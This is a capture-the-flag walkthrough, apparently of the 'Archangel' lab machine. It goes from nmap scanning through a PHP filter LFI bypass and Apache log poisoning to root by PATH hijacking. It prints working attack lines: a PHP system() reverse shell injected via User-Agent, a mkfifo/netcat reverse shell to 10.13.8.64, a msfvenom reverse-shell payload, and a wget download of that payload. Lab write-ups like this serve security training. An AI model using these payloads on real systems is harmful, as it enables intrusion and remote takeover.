Archangel

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.104.47

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.104.47

Enumeration

Lets visit the webpage

Looking at the page, we see a domain , lets add this to our /etc/hosts file

Now lets go to the webpage.

We have the first flag

Lets look for a robots.txt file as we usually find pages that are important.

And we found one, lets visit this

The page has a button, lets press it

It takes us to a different page. Looking at the URL , the view parameter is navigating through the directories, lets try to use some LFI commands to find vulnerabilities. I was searching on google when I found this.

Exploitation

They say that we can use this command to bypass the filter and get a LFI vulnerability, lets test it out.

http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index

Lets change this command to our page and php file.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

When we replace the current URL with this one, we get this

Its a base64 encoded string. When we decode it, we get the message earlier.

Now lets try to read other pages like test.php.

We get another base64 encoded string, lets decode it.

We have the second flag.

Lets now look at the code closely

In line 17 we can see the conditions. The first one is that the parameter should not contain the substring ../../ and the second one is that the parameter must contain the string /var/www/html/development_testing. So for the first conditions we can use ../../../ .

We know that this is running on Apache web server so there should be a access.log file, lets check if we can access it.

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log

Now we can try log poisoning to get Remote Code Execution (RCE): We have to send this reverse shell in the request.

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f');?>

Make sure to set up a netcat listener

First we have to intercept the request and pass this code in the user-agent parameter

And now if we send the request we get a reverse shell.

Now lets stabilize the shell

We can read the user.txt file

Privilege Escalation

In the home/myfiles directory of archangel you see a passwordbackup file, you can go check it out.

https://www.youtube.com/watch?v=dQw4w9WgXcQ

We have another directory which might be interesting called secret, lets try to change directories into it.

And we are not allowed. We need to be the user archangel to access this. Lets look at other files that are owned by archangel.

find / -user archangel -type f 2>/dev/null

We find these, the first one looks interesting, so lets check it out.

Its a bash script, lets look at the permissions to see if we can write to it.

Looks like we can so lets echo a reverse shell into the file and execute to get a reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Also make sure to start a netcat reverse shell listener

Now lets echo the reverse shell into the file and execute the file

We are archangel now. Lets stabilize the shell

Lets go into the secret directory

We can read the user2.txt file, lets read the other file called backup.

Looks like we can't the output we can read, lets see what type of file it is.

Its a LSD shared object. Lets use the strings command to get more information

This command is interesting, the cp command is run without the full path , which means that this is exploitable, lets create msfvenom payload called cp and adjust the PATH variable and when executed we should get a reverse shell.

msfvenom -p linux/x64/shell_reverse_tcp -f elf -o cp LHOST=10.13.8.64 LPORT=1234

Now we have to transfer the file so lets start a http server.

python3 -m http.server 8000

Now use this command on the victim machine to download the file, make sure you are in the secret directory.

wget http://10.13.8.64/cp

Now lets modify the PATH variable.

echo $PATH
export PATH=/home/archangel/secret:$PATH
echo $PATH

Now start a netcat listener and make the cp file executable

Now run the backup file

And you should get a reverse shell as root

Last updated